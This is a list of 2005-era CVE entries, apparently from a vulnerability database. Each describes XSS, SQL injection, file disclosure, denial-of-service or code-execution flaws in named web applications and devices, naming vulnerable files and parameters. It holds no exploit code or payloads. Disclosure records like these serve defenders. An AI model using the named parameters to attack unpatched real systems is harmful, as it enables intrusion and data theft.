[CVE-2005-4249] ADP Forum 2.0 through 2.0.3 stores sensitive information in plaintext files under the web document root with insufficient access control, which allows remote attackers to obtain user credentials via requests to the forum/users directory.
[CVE-2005-4248] Multiple cross-site scripting (XSS) vulnerabilities in QuickPayPro 3.1 allow remote attackers to inject arbitrary web script or HTML via various fields, such as those in (1) communication/subscribers.tracking.add.php, (2) support/tickets.add.php, and (3) mycompany/categories.php.
[CVE-2005-4247] Cross-site scripting (XSS) vulnerability in index.php in Plogger Beta 2 and earlier allows remote attackers to inject arbitrary web script or HTML via the searchterms parameter.
[CVE-2005-4245] Cross-site scripting (XSS) vulnerability in search.php in Snipe Gallery 3.1.4 and earlier allows remote attackers to inject arbitrary web script or HTML via the keyword parameter.
[CVE-2005-4242] Multiple cross-site scripting (XSS) vulnerabilities in Horde Turba H3 2.0.4 and earlier allow remote attackers to inject arbitrary web script or HTML via (1) the address book and (2) contact data.
[CVE-2005-4241] Cross-site scripting (XSS) vulnerability in the category page in VCD-db 0.98 and earlier allows remote attackers to inject arbitrary web script or HTML via the batch parameter.
[CVE-2005-4239] Cross-site scripting (XSS) vulnerability in Search/DisplayResults.php in PHP JackKnife 2.21 and earlier allows remote attackers to inject arbitrary web script or HTML via URL-encoded values in the sKeywords parameter.
[CVE-2005-4238] Cross-site scripting (XSS) vulnerability in view_filters_page.php in Mantis 1.0.0rc3 and earlier allows remote attackers to inject arbitrary web script or HTML via the target_field parameter.
[CVE-2005-4237] Cross-site scripting (XSS) vulnerability in MySQL Auction 3.0 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified search module parameters, possibly the keyword parameter in the SearchZoom module.
[CVE-2005-4236] Cross-site scripting (XSS) vulnerability in search.php in CKGOLD allows remote attackers to inject arbitrary web script or HTML via the search parameters.
[CVE-2005-4235] Cross-site scripting (XSS) vulnerability in knowledgebase.php in WHMCompleteSolution 2.1 and earlier allows remote attackers to inject arbitrary web script or HTML via the search parameters.
[CVE-2005-4231] Cross-site scripting (XSS) vulnerability in Link Up Gold 2.5 and earlier allows remote attackers to inject arbitrary web script or HTML via (1) link parameter to tell_friend.php, (2) phrase[] parameter to search.php in a search_links_advanced action, and the (3) direction or (4) sort parameter to articles.php.
[CVE-2005-4229] Cross-site scripting (XSS) vulnerability in auction.pl in EveryAuction 1.53 and earlier allows remote attackers to inject arbitrary web script or HTML via the searchstring parameter. NOTE: the provenance of this issue is unknown.
[CVE-2005-4228] Multiple SQL injection vulnerabilities in PhpWebGallery 1.5.1 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) since, (2) sort_by, and (3) items_number parameters to comments.php, (4) the search parameter to category.php, and (5) image_id parameter to picture.php. NOTE: it was later reported that the comments.php/sort_by vector also affects 1.7.2 and earlier.
[CVE-2005-4226] Multiple "potential" SQL injection vulnerabilities in phpWebThings 1.4 Patched might allow remote attackers to execute arbitrary SQL commands via (1) the ref parameter in download.php, (2) the direction, msg, sforum, reason, subname, and toform parameters in forum.php, (3) the msg and forum parameters in forum_edit.php, (4) the msg and forum parameters in forum_write.php, (5) the tekst parameter in guestbook.php, (6) the menuoption parameter in index.php, and the (7) sel_avatar parameter in myaccount.php. NOTE: the forum.php/forum vector is already identified by CVE-2005-3585.
[CVE-2005-4222] Multiple cross-site scripting (XSS) vulnerabilities in guestbook.cgi in Lars Ellingsen Guestserver 4.13 and earlier allow remote attackers to inject arbitrary web script or HTML via unspecified message fields.
[CVE-2005-4220] Netgear RP114, and possibly other versions and devices, allows remote attackers to cause a denial of service via a SYN flood attack between one system on the internal interface and another on the external interface, which temporarily stops routing between the interfaces, as demonstrated using nmap.
[CVE-2005-4219] setting.php in Innovative CMS (ICMS, formerly Imoel-CMS) contains username and password information in cleartext, which might allow attackers to obtain this information via a direct request to setting.php. NOTE: on a properly configured web server, it would be expected that a .php file would be processed before content is returned to the user, so this might not be a vulnerability.
[CVE-2005-4218] SQL injection vulnerability in forum.php in PHPWebThings 1.4 allows remote attackers to execute arbitrary SQL commands via the msg parameter, a different vulnerability than CVE-2005-3585.
[CVE-2005-4209] WorldClient webmail in Alt-N MDaemon 8.1.3 allows remote attackers to prevent arbitrary users from accessing their inboxes via script tags in the Subject header of an e-mail message, which prevents the user from being able to access the Inbox folder, possibly due to a cross-site scripting (XSS) vulnerability.
[CVE-2005-4207] SQL injection vulnerability in BTGrup Admin WebController Script allows remote attackers to execute SQL commands via the (1) Username and (2) Password fields.
[CVE-2005-4205] Cross-site scripting (XSS) vulnerability in searchdb.asp in LocazoList 1.03c and earlier allows remote attackers to inject arbitrary web script or HTML via the q parameter.
[CVE-2005-4196] Multiple cross-site scripting (XSS) vulnerabilities in Scout Portal Toolkit (SPT) 1.3.1 and earlier allow remote attackers to inject arbitrary web script or HTML via (1) the ss parameter in SPT--QuickSearch.php
[CVE-2005-4193] Cross-site scripting (XSS) vulnerability in UseBB before 0.7 allows remote attackers to inject arbitrary web script or HTML via the $_SERVER['PHP_SELF'] variable.
[CVE-2005-4192] Multiple cross-site scripting (XSS) vulnerabilities in templates/notepads/notepads.inc in Horde Mnemo Note Manager H3 before 2.0.3 allow remote authenticated users to inject arbitrary web script or HTML via (1) the notepad's name or (2) description, when creating a new notepad.
[CVE-2005-4191] Multiple cross-site scripting (XSS) vulnerabilities in templates/tasklists/tasklists.inc in Horde Nag Task List Manager H3 before 2.0.4 allow remote authenticated users to inject arbitrary web script or HTML via (1) the tasklist's name or (2) description, when creating a new tasklist.
[CVE-2005-4190] Multiple cross-site scripting (XSS) vulnerabilities in Horde Application Framework before 3.0.8 allow remote authenticated users to inject arbitrary web script or HTML via multiple vectors, as demonstrated by (1) the identity field, (2) Category and (3) Label search fields, (4) the Mobile Phone field, and (5) Date and (6) Time fields when importing CSV files, as exploited through modules such as (a) Turba Address Book, (b) Kronolith, (c) Mnemo, and (d) Nag.
[CVE-2005-4189] Multiple cross-site scripting (XSS) vulnerabilities in Horde Kronolith H3 before 2.0.6 allow remote authenticated users to inject arbitrary web script or HTML via (1) the Calendar name field when creating calendars, (2) event title field when deleting events, the (3) Category and (4) Location search fields, and the (5) attendees email address fields when editing event attendees, and possibly other vectors.
[CVE-2005-4177] Cross-site scripting (XSS) vulnerability in book.cfm in Magic Book Personal and Professional 2.0 allows remote attackers to inject arbitrary web script or HTML via the StartRow parameter.
[CVE-2005-4167] Cross-site scripting (XSS) vulnerability in eFiction 1.0 and 1.1 allows remote attackers to inject arbitrary web script or HTML via the let parameter in a viewlist action to titles.php.
[CVE-2005-4166] Cross-site scripting (XSS) vulnerability in password.asp in DUWare DUportal Pro 3.4.3 allows remote attackers to inject arbitrary web script or HTML via the result parameter.
[CVE-2005-4162] Cross-site scripting (XSS) vulnerability in cal_make.pl in ACME PerlCal 2.99.20 allows remote attackers to inject arbitrary web script or HTML via the p0 parameter.
[CVE-2005-4161] ** DISPUTED ** Multiple cross-site scripting (XSS) vulnerabilities in MilliScripts 1.4 redirect script allow remote attackers to inject arbitrary web script or HTML via the domainname parameter to register.php, and other unspecified vectors. NOTE: the vendor has disputed this issue, stating "No invalid input can reach the script."
[CVE-2005-4154] Unspecified vulnerability in PEAR installer 1.4.2 and earlier allows user-assisted attackers to execute arbitrary code via a crafted package that can execute code when the pear command is executed or when the Web/Gtk frontend is loaded.
[CVE-2005-4140] SQL injection vulnerability in admin/login/index.php in Website Baker 2.6.0 allows remote attackers to execute arbitrary SQL commands via the username parameter, as used by the user field.
[CVE-2005-4138] Multiple cross-site scripting (XSS) vulnerabilities in ThWboard before 3 Beta 2.84 allow remote attackers to inject arbitrary web script or HTML via the (1) Wohnort and (2) Beruf fields in editprofile.php, (3) user parameter array in v_profile.php, and (4) the action parameter in misc.php.
[CVE-2005-4136] Cross-site scripting (XSS) vulnerability in login.php in DRZES HMS 3.2 allows remote attackers to inject arbitrary web script or HTML via the customerEmailAddress parameter.
[CVE-2005-4134] Mozilla Firefox 1.5, Netscape 8.0.4 and 7.2, and K-Meleon before 0.9.12 allow remote attackers to cause a denial of service (CPU consumption and delayed application startup) via a web site with a large title, which is recorded in history.dat but not processed efficiently during startup. NOTE: despite initial reports, the Mozilla vendor does not believe that this issue can be used to trigger a crash or buffer overflow in Firefox. Also, it has been independently reported that Netscape 8.1 does not have this issue.
[CVE-2005-4133] Sun Update Connection in Sun Solaris 10, when configured to use a web proxy, allows local users to obtain the proxy authentication password via (1) an unspecified vector and (2) proxy log files.
[CVE-2005-4091] Cross-site scripting (XSS) vulnerability in 1search.cgi in 1-Script 1-Search 1.8 allows remote attackers to inject arbitrary web script or HTML via the q parameter.
[CVE-2005-4085] Buffer overflow in BlueCoat (a) WinProxy before 6.1a and (b) the web console access functionality in ProxyAV before 2.4.2.3 allows remote attackers to execute arbitrary code via a long Host: header.
[CVE-2005-4078] Multiple cross-site scripting (XSS) vulnerabilities in Ideal BB.NET 1.3 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) forumID, (2) boardID, and (3) topicRepeater1-p parameters in topics.aspx, (4) boardID parameter in categoryindex.aspx, (5) postID parameter in posts.aspx, (6) catID parameter in forums.aspx, and (7) memberID parameter in member.aspx.
[CVE-2005-4075] Multiple cross-site scripting (XSS) vulnerabilities in index.cfm in CF_Nuke 4.6 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) topic and (2) newsid parameter in the news sector, and (3) cat parameter in the links sector.
[CVE-2005-4072] Cross-site scripting (XSS) vulnerability in CFMagic Magic Forum Personal 2.5 and earlier allows remote attackers to inject arbitrary web script or HTML via the Words parameter in search_forums.cfm, as used in the "Search For:" field.
[CVE-2005-4063] Multiple cross-site scripting (XSS) vulnerabilities in NetAuctionHelp 3.0 and earlier allow remote attackers to inject arbitrary HTML and web script via the (1) L, (2) sort, (3) category, (4) categoryname parameters to search.asp.
[CVE-2005-4062] Cross-site scripting (XSS) vulnerability in CPSearch.asp in XcClassified 3.x allows remote attackers to inject arbitrary web script or HTML via the search parameters.
[CVE-2005-4061] Cross-site scripting (XSS) vulnerability in PASearch.asp in XcPhotoAlbum 1.x allows remote attackers to inject arbitrary web script or HTML via the search parameters.
[CVE-2005-4060] Cross-site scripting (XSS) vulnerability in search.asp in rwAuction Pro 4.0 and 5.0 allows remote attackers to inject arbitrary web script or HTML via the searchtxt parameter.
[CVE-2005-4057] Cross-site scripting (XSS) vulnerability in search.php in PluggedOut Nexus 0.1 allows remote attackers to inject arbitrary web script or HTML via the (1) Location, (2) Last Name, and (3) First Name parameters.
[CVE-2005-4053] Cross-site scripting (XSS) vulnerability in coWiki 0.3.4 allows remote attackers to inject arbitrary web script or HTML via the q parameter, as demonstrated using 26.html.
[CVE-2005-4052] e107 0.6174 allows remote attackers to redirect users to other web sites via the download parameter in rate.php, which is used after a user submits a file download rating. NOTE: in the default installation, the e_BASE variable restricts the redirection to the same web site.
[CVE-2005-4047] Cross-site scripting (XSS) vulnerability in kb.asp in IISWorks ASPKnowledgeBase 2.0 allows remote attackers to inject arbitrary web script or HTML via the a parameter.
[CVE-2005-4046] Unspecified vulnerability in Reverse SSL Proxy Plug-in for Sun Java System Application Server Standard Edition 7 2004Q2, Application Server Enterprise Edition 8.1 2005Q1, and Sun ONE Application Server 7 Standard Edition, as used in multiple web servers, allows remote attackers to conduct man-in-the-middle (MITM) attacks and "compromise data privacy."
[CVE-2005-4044] Cross-site scripting (XSS) vulnerability in search.cgi in Amazon Search Directory 1.0.0 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, possibly the search parameter.
[CVE-2005-4042] Cross-site scripting (XSS) vulnerability in Warm Links 1.0.0 and earlier allows remote attackers to inject arbitrary web script or HTML via a parameter to search.cgi.
[CVE-2005-4041] Cross-site scripting (XSS) vulnerability in search.cgi in MR CGI Guy Hot Links SQL 3.1.x and Hot Links Pro 3.1.x allows remote attackers to inject arbitrary web script or HTML via the query string.
[CVE-2005-4039] Directory traversal vulnerability in arhiva.php in Web4Future Portal Solutions News Portal allows remote attackers to read arbitrary files via the dir parameter.
[CVE-2005-4038] SQL injection vulnerability in comentarii.php in Web4Future Portal Solutions News Portal allows remote attackers to execute arbitrary SQL commands via the idp parameter.
[CVE-2005-4037] SQL injection vulnerability in functions.php in Web4Future Affiliate Manager PRO 4.1 and earlier allows remote attackers to execute arbitrary SQL commands via the pid parameter.
[CVE-2005-4036] Cross-site scripting (XSS) vulnerability in index.cgi in Web4Future KeyWord Frequency Counter 1.0 allows remote attackers to inject arbitrary web script or HTML via the "remote URL."
[CVE-2005-4035] Multiple SQL injection vulnerabilities in Web4Future eCommerce Enterprise Edition 2.1 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) prod, and (2) brid parameters to (a) view.php
[CVE-2005-4034] Multiple SQL injection vulnerabilities in Web4Future eDating Professional 5 allow remote attackers to execute arbitrary SQL commands via the (1) s, (2) pg, and (3) sortb parameters to (a) index.php
[CVE-2005-4032] Cross-site scripting (XSS) vulnerability in search.cgi in Easy Search System 1.1 and earlier allows remote attackers to inject arbitrary web script or HTML via the q parameter.
[CVE-2005-4029] WebEOC before 6.0.2 allows remote attackers to obtain valid usernames via the HTML source of the WebEOC login webpage, which could be useful in other attacks such as locking out valid users via brute force methods.
[CVE-2005-4028] Multiple cross-site scripting (XSS) vulnerabilities in aMember allow remote attackers to inject arbitrary web script or HTML via the (1) lamember_login parameter to sendpass.php and (2) login parameter to member.php.
[CVE-2005-4026] search.php in Geeklog 1.4.x before 1.4.0rc1, and 1.3.x before 1.3.11sr3, allows remote attackers to obtain sensitive information via invalid (1) datestart and (2) dateend parameters, which leaks the web server path in an error message.
[CVE-2005-4024] Cross-site scripting (XSS) vulnerability in Interspire FastFind 2004 and 2005 allows remote attackers to inject arbitrary web script or HTML via the query parameter.
[CVE-2005-4022] Cross-site scripting (XSS) vulnerability in the "Add Image From Web" feature in Gallery 2.0 before 2.0.2 allows remote attackers to inject arbitrary web script or HTML via Javascript in an IMG tag.
[CVE-2005-4021] The installer for Gallery 2.0 before 2.0.2 stores the install log under the web document root with insufficient access control, which allows remote attackers to obtain sensitive information.
[CVE-2005-4015] PHP Web Statistik 1.4 does not rotate the log database or limit the size of the referer field, which allows remote attackers to fill the log files via a large number of requests, as demonstrated using pixel.php.
[CVE-2005-4014] stat.php in PHP Web Statistik 1.4 allows remote attackers to cause a denial of service (CPU consumption) via a large lastnumber value.
[CVE-2005-4013] PHP Web Statistik 1.4 stores the stat.cfg file under the web root with insufficient access control, which allows remote attackers to obtain sensitive information such as statistics and the log directory location, possibly including the logdb.dta file.
[CVE-2005-4012] Multiple cross-site scripting (XSS) vulnerabilities in PHP Web Statistik 1.4 allow remote attackers to inject arbitrary web script or HTML via (1) the lastnumber parameter to stat.php and (2) the HTTP referer to pixel.php.
[CVE-2005-4004] Cross-site scripting (XSS) vulnerability in search.asp in MyTemplateSite 1.2 and earlier allows remote attackers to inject arbitrary web script or HTML via the q parameter.
[CVE-2005-4002] WebEOC before 6.0.2 uses the same secret key for all installations, which allows attackers with the key to decrypt data from any WebEOC installation.
[CVE-2005-4000] Cross-site scripting (XSS) vulnerability in archive.asp in SiteBeater News System 4.00 and earlier allows remote attackers to inject arbitrary web script or HTML via the sKeywords parameter.
[CVE-2005-3999] Cross-site scripting (XSS) vulnerability in Search.asp in SiteBeater MP3 Catalog 2.03 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified parameters.
[CVE-2005-3998] Cross-site scripting (XSS) vulnerability in search.asp in Solupress News 1.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the keywords parameter.
[CVE-2005-3997] Zen Cart 1.2.6d and earlier, under certain PHP configurations, allows remote attackers to obtain sensitive information via direct requests to files in the admin/includes directory, including (1) graphs/banner_daily.php, (2) graphs/banner_infobox.php, (3) graphs/banner_yearly.php, (4) graphs/banner_monthly.php, (5) application_bottom.php, (6) attributes_preview.php, (7) modules/category_product_listing.php, (8) modules/copy_to_confirm.php, (9) modules/delete_product_confirm.php, and (10) modules/move_product_confirm.php, which leaks the web server path in the resulting error message.
[CVE-2005-3991] Multiple cross-site scripting (XSS) vulnerabilities in phpMyChat 0.14.6 allow remote attackers to inject arbitrary web script or HTML via the medium parameter to (1) start_page.css.php and (2) style.css.php.
[CVE-2005-3984] SQL injection vulnerability in WebCalendar 1.0.1 allows remote attackers to execute arbitrary SQL commands via the time_range parameter to edit_report_handler.php. NOTE: the startid/activity_log.php vector is already covered by CVE-2005-3949.
[CVE-2005-3982] CRLF injection vulnerability in layers_toggle.php in WebCalendar 1.0.1 might allow remote attackers to modify HTTP headers and conduct HTTP response splitting attacks via the ret parameter, which is used to redirect URL requests.
[CVE-2005-3977] Cross-site scripting (XSS) vulnerability in QualityEBiz Quality PPC 1553 allows remote attackers to inject web script or HTML via the REQ parameter to the search module.
[CVE-2005-3975] Interpretation conflict in file.inc in Drupal 4.5.0 through 4.5.5 and 4.6.0 through 4.6.3 allows remote authenticated users to inject arbitrary web script or HTML via HTML in a file with a GIF or JPEG file extension, which causes the HTML to be executed by a victim who views the file in Internet Explorer as a result of CVE-2005-3312. NOTE: it could be argued that this vulnerability is due to a design flaw in Internet Explorer and the proper fix should be in that browser.
[CVE-2005-3973] Multiple cross-site scripting (XSS) vulnerabilities in Drupal 4.5.0 through 4.5.5 and 4.6.0 through 4.6.3 allow remote attackers to inject arbitrary web script or HTML via various HTML tags and values, such as the (1) legend tag and the value parameter used in (2) label and (3) input tags, possibly due to an incomplete blacklist.
[CVE-2005-3972] Cross-site scripting (XSS) vulnerability in extremesearch.php in Extreme Search Corporate Edition 6.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the search parameter.
[CVE-2005-3971] Cross-site scripting (XSS) vulnerability in the login form in Citrix MetaFrame Secure Access Manager 2.0 through 2.2 and NFuse Elite 1.0 allows remote attackers to inject arbitrary web script or HTML via the username field.
[CVE-2005-3970] Cross-site scripting (XSS) vulnerability in MXChange before 0.2.0-pre10 PL492 allows remote attackers to inject arbitrary web script or HTML via unknown vectors.
[CVE-2005-3967] Cross-site scripting (XSS) vulnerability in the dosearchsite.action module in Atlassian Confluence 2.0.1 Build 321 allows remote attackers to inject arbitrary web script or HTML via the searchQuery.queryString search module parameter.
[CVE-2005-3966] Cross-site scripting (XSS) vulnerability in search.jsp in Java Search Engine (JSE) 0.9.34 allows remote attackers to inject arbitrary web script or HTML via the q parameter.
[CVE-2005-3961] export_handler.php in WebCalendar 1.0.1 allows remote attackers to overwrite WebCalendar data files via a modified id parameter.
[CVE-2005-3959] Multiple cross-site scripting (XSS) vulnerabilities in FreeWebStat 1.0 rev37 allow remote attackers to inject arbitrary web script or HTML via the (1) site, (2) jsref, (3) jsres, and (4) jscolor parameters to pixel.php, which are not sanitized before being included in the logdb.html file, and (5) the search key to stat.php.
[CVE-2005-3955] Multiple cross-site scripting (XSS) vulnerabilities in MagpieRSS 7.1, as used in (a) blogBuddiesv 0.3, (b) Jaws 0.6.2, and possibly other products, allow remote attackers to inject arbitrary web script or HTML via the (1) url parameter to (a) magpie_debug.php and (2) rss_url parameter to (b) magpie_slashbox.php and (c) simple_smarty.php.
[CVE-2005-3954] Cross-site scripting (XSS) vulnerability in blogBuddies 0.3 allows remote attackers to inject arbitrary web script or HTML via the u parameter to index.php.
[CVE-2005-3949] Multiple SQL injection vulnerabilities in WebCalendar 1.0.1 allow remote attackers to execute arbitrary SQL commands via the (1) startid parameter to activity_log.php, (2) startid parameter to admin_handler.php, (3) template parameter to edit_template.php, and (4) multiple parameters to export_handler.php.
[CVE-2005-3919] Cross-site scripting (XSS) vulnerability in PBLang 4.65 allows remote attackers to inject arbitrary web script or HTML via multiple fields in (1) UCP.php and (2) SendPm.php.
[CVE-2005-3915] The Internet Key Exchange version 1 (IKEv1) implementation in Clavister Client Web allows remote attackers to cause a denial of service and possibly execute arbitrary code via crafted IKE packets, as demonstrated by the PROTOS ISAKMP Test Suite for IKEv1. NOTE: due to the lack of details in the advisory, it is unclear which of CVE-2005-3666, CVE-2005-3667, and/or CVE-2005-3668 this issue applies to.
[CVE-2005-3912] Format string vulnerability in miniserv.pl Perl web server in Webmin before 1.250 and Usermin before 1.180, with syslog logging enabled, allows remote attackers to cause a denial of service (crash or memory consumption) and possibly execute arbitrary code via format string specifiers in the username parameter to the login form, which is ultimately used in a syslog call. NOTE: the code execution might be associated with an issue in Perl.
[CVE-2005-3908] Cross-site scripting (XSS) vulnerability in search.php in GhostScripter Amazon Shop 5.0.0, and other versions before 5.0.2, allows remote attackers to inject web script or HTML via the query parameter.
[CVE-2005-3902] Cross-site scripting (XSS) vulnerability in gui/errordocs/index.php in Virtual Hosting Control System (VHCS) 2.2.0 through 2.4.6.2 allows remote attackers to inject arbitrary web script or HTML via query strings that are included in an error message, as demonstrated using a parameter containing script.
[CVE-2005-3895] Open Ticket Request System (OTRS) 1.0.0 through 1.3.2 and 2.0.0 through 2.0.3, when AttachmentDownloadType is set to inline, renders text/html e-mail attachments as HTML in the browser when the queue moderator attempts to download the attachment, which allows remote attackers to execute arbitrary web script or HTML. NOTE: this particular issue is referred to as XSS by some sources.
[CVE-2005-3894] Multiple cross-site scripting (XSS) vulnerabilities in index.pl in Open Ticket Request System (OTRS) 1.0.0 through 1.3.2 and 2.0.0 through 2.0.3 allow remote authenticated users to inject arbitrary web script or HTML via (1) hex-encoded values in the QueueID parameter and (2) Action parameters.
[CVE-2005-3892] Gadu-Gadu 7.20 allows remote attackers to eavesdrop on a user via a web page that accesses the EasycallLite.oce ActiveX control, which can initiate an outgoing phone call and listen to the microphone.
[CVE-2005-3869] Cross-site scripting (XSS) vulnerability in index.php in Google API Search 1.3.1 and earlier allows remote attackers to inject arbitrary web script or HTML via hex-encoded values in the REQ parameter.
[CVE-2005-3867] Cross-site scripting (XSS) vulnerability in RevenuePilot Search Engine Script 1.2.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the REQ parameter, which is used when performing a search.
[CVE-2005-3866] Cross-site scripting (XSS) vulnerability in SearchFeed Search Engine 1.3.2 and earlier allows remote attackers to inject arbitrary HTML and web script, possibly via the REQ parameter, which is used when performing a search.
[CVE-2005-3865] SQL injection vulnerability in index.php in AllWeb search 3.0 and earlier allows remote attackers to execute arbitrary SQL commands via the search parameter.
[CVE-2005-3860] PHP remote file inclusion vulnerability in athena.php in Oliver May Athena PHP Website Administration 0.1a allows remote attackers to execute arbitrary PHP code via a URL in the athena_dir parameter.
[CVE-2005-3854] Cross-site scripting (XSS) vulnerability in index.php in EasyPageCMS allows remote attackers to inject arbitrary web script or HTML via the cat parameter.
[CVE-2005-3851] Cross-site scripting (XSS) vulnerability in search.asp in Online Attendance System (OASYS) Lite 1.0 allows remote attackers to inject arbitrary web script or HTML via certain search parameters, possibly the keyword parameter.
[CVE-2005-3850] Cross-site scripting (XSS) vulnerability in search.asp in Online Knowledge Base System (OKBSYS) Lite Edition 1.0 allows remote attackers to inject arbitrary web script or HTML via hex-encoded values in the q parameter.
[CVE-2005-3849] Cross-site scripting (XSS) vulnerability in the Search module in PmWiki up to 2.0.12 allows remote attackers to inject arbitrary web script or HTML via the q parameter.
[CVE-2005-3841] Cross-site scripting (XSS) vulnerability in kPlaylist 1.6 (build 400), and possibly other versions, allows remote attackers to inject arbitrary web script or HTML via the searchfor search parameter.
[CVE-2005-3839] Cross-site scripting (XSS) vulnerability in SupportPRO Supportdesk allows remote attackers to inject arbitrary web script or HTML via the (1) post tickers and (2) view tickets options.
[CVE-2005-3837] Cross-site scripting (XSS) vulnerability in the search module in sCssBoard 1.2 and 1.12, and earlier versions, allows remote attackers to inject arbitrary web script or HTML via the search_term parameter.
[CVE-2005-3834] Cross-site scripting (XSS) vulnerability in search.php in Tunez 1.21 and earlier allows remote attackers to inject arbitrary web script or HTML via the searchFor parameter.
[CVE-2005-3821] Cross-site scripting (XSS) vulnerability in vTiger CRM 4.2 and earlier allows remote attackers to inject arbitrary web script or HTML via multiple vectors, including the account name.
[CVE-2005-3818] Multiple cross-site scripting (XSS) vulnerabilities in vTiger CRM 4.2 and earlier allow remote attackers to inject arbitrary web script or HTML via (1) various input fields, including the contact, lead, and first or last name fields, (2) the record parameter in a DetailView action in the Leads module for index.php, (3) the $_SERVER['PHP_SELF'] variable, which is used in multiple locations such as index.php, and (4) aggregated RSS feeds in the RSS aggregation module.
[CVE-2005-3817] Multiple SQL injection vulnerabilities in Softbiz Web Host Directory Script 1.1 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) cid parameter in search_result.php, (2) sbres_id parameter in review.php, (3) cid parameter in browsecats.php, (4) h_id parameter in email.php, and (5) an unspecified parameter to the search module.
[CVE-2005-3814] Multiple cross-site scripting (XSS) vulnerabilities in SmartPPC Pro allow remote attackers to inject arbitrary web script or HTML via the username parameter in (1) directory.php, (2) frames.php, and (3) search.php.
[CVE-2005-3795] Multiple cross-site scripting (XSS) vulnerabilities in AlstraSoft Affiliate Network Pro 7.2 allow remote attackers to inject arbitrary web script or HTML via (1) the Err parameter in admin/index.php and the (2) firstname and (3) lastname parameters in index.php.
[CVE-2005-3790] Multiple cross-site scripting (XSS) vulnerabilities in act_newsletter.php in phpwcms 1.2.5 allow remote attackers to inject arbitrary web script or HTML via the (1) i and (2) text parameters.
[CVE-2005-3788] Race condition in Cisco Adaptive Security Appliance (ASA) 7.0(0), 7.0(2), and 7.0(4), when running with an Active/Standby configuration and when the failover LAN interface fails, allows remote attackers to cause a denial of service (standby firewall failure) by sending spoofed ARP responses from an IP address of an active firewall, which prevents the standby firewall from becoming active, aka "failover denial of service."
[CVE-2005-3787] Multiple cross-site scripting (XSS) vulnerabilities in phpMyAdmin before 2.6.4-pl4 allow remote attackers to inject arbitrary web script or HTML via (1) the cookie-based login panel, (2) the title parameter and (3) the table creation dialog.
[CVE-2005-3776] Multiple cross-site scripting (XSS) vulnerabilities in MyBulletinBoard (MyBB) 1.0 PR2 Rev 686 allow remote attackers to inject arbitrary web script or HTML via (1) the subject field when creating a new thread and (2) information passed to the Reputation system.
[CVE-2005-3771] Multiple cross-site scripting (XSS) vulnerabilities in Joomla! before 1.0.4 allow remote attackers to inject arbitrary web script or HTML via (1) "GET and other variables" and (2) "SEF".
[CVE-2005-3770] Multiple cross-site scripting (XSS) vulnerabilities in PHP-Post (PHPp) 1.0 allow remote attackers to inject arbitrary web script or HTML via (1) the subject in a post, or the user parameter to (2) profile.php and (3) mail.php.
[CVE-2005-3766] Exponent CMS 0.96.3 and later versions stores sensitive user pages under the web document root with insufficient access control even though certain permissions are specified, which allows attackers to access the pages by browsing uploaded files.
[CVE-2005-3761] Cross-site scripting (XSS) vulnerability in Exponent CMS 0.96.3 and later versions allows remote attackers to inject arbitrary web script or HTML via (1) Javascript in forms produced by the form generator or (2) the parameters to the installer.
[CVE-2005-3760] Double free vulnerability in the BBOORB module in IBM WebSphere Application Server for z/OS 5.0 allows attackers to cause a denial of service (ABEND).
[CVE-2005-3759] Multiple cross-site scripting (XSS) vulnerabilities in Horde before 3.0.7 allow remote attackers to inject arbitrary web script or HTML via the (1) gzip/tar and (2) css MIME viewers, which do not filter or escape dangerous HTML when extracting and displaying attachments.
[CVE-2005-3758] Cross-site scripting (XSS) vulnerability in Google Mini Search Appliance, and possibly Google Search Appliance, allows remote attackers to inject arbitrary Javascript, and possibly other web script or HTML, via a proxystylesheet variable that contains a malicious XSLT style sheet.
[CVE-2005-3754] Cross-site scripting (XSS) vulnerability in Google Mini Search Appliance, and possibly Google Search Appliance, allows remote attackers to inject arbitrary Javascript, and possibly other web script or HTML, via the proxystylesheet variable, which will be executed in the resulting error message.
[CVE-2005-3751] HTTP request smuggling vulnerability in Pound before 1.9.4 allows remote attackers to poison web caches, bypass web application firewall protection, and conduct XSS attacks via an HTTP request with conflicting Content-length and Transfer-encoding headers.
[CVE-2005-3745] Cross-site scripting (XSS) vulnerability in Apache Struts 1.2.7, and possibly other versions allows remote attackers to inject arbitrary web script or HTML via the query string, which is not properly quoted or filtered when the request handler generates an error message.
[CVE-2005-3742] Cross-site scripting (XSS) vulnerability in popup.php in Advanced Poll 2.0.3 and earlier allows remote attackers to inject arbitrary web script or HTML via the poll_ident parameter.
[CVE-2005-3736] Multiple cross-site scripting (XSS) vulnerabilities in e-Quick Cart allow remote attackers to inject arbitrary web script or HTML via the (1) strgifttoname parameter in shopgift.asp, (2) strfirstname parameter in shopmaillist.asp, (3) strpid parameter in shopprojectlogin.asp, and (4) Custname parameter in shoptellafriend.asp.
[CVE-2005-3734] Cross-site scripting (XSS) vulnerability in the "add content" page in phpMyFAQ 1.5.3 and earlier allows remote attackers to inject arbitrary web script or HTML via the (1) thema, (2) username, and (3) usermail parameters.
[CVE-2005-3730] Multiple cross-site scripting (XSS) vulnerabilities in HTTPTranslatorServlet in Idetix Software Systems Revize CMS allow remote attackers to inject arbitrary web script or HTML via the (1) resourcetype, (2) objectmap, and (3) redirect parameters, possibly involving setWebSpace.jsp.
[CVE-2005-3728] Idetix Software Systems Revize CMS stores conf/revize.xml under the web document root with insufficient access control, which allows remote attackers to obtain sensitive configuration information.
[CVE-2005-3714] The network interface for Apple AirPort Express 6.x before Firmware Update 6.3, and AirPort Extreme 5.x before Firmware Update 5.7, allows remote attackers to cause a denial of service (unresponsive interface) via malformed packets.
[CVE-2005-3705] Heap-based buffer overflow in WebKit in Mac OS X and OS X Server 10.3.9 and 10.4.3, as used in applications such as Safari, allows remote attackers to execute arbitrary code via unknown attack vectors.
[CVE-2005-3699] Opera Web Browser 8.50 and 8.0 through 8.0.2 allows remote attackers to spoof the URL in the status bar via the title in an image in a link to a trusted site within a form to the malicious site.
[CVE-2005-3697] Unspecified vulnerability in the administration interface in Uresk Links 2.0 Lite allows remote attackers to bypass authentication via unspecified vectors in index.php.
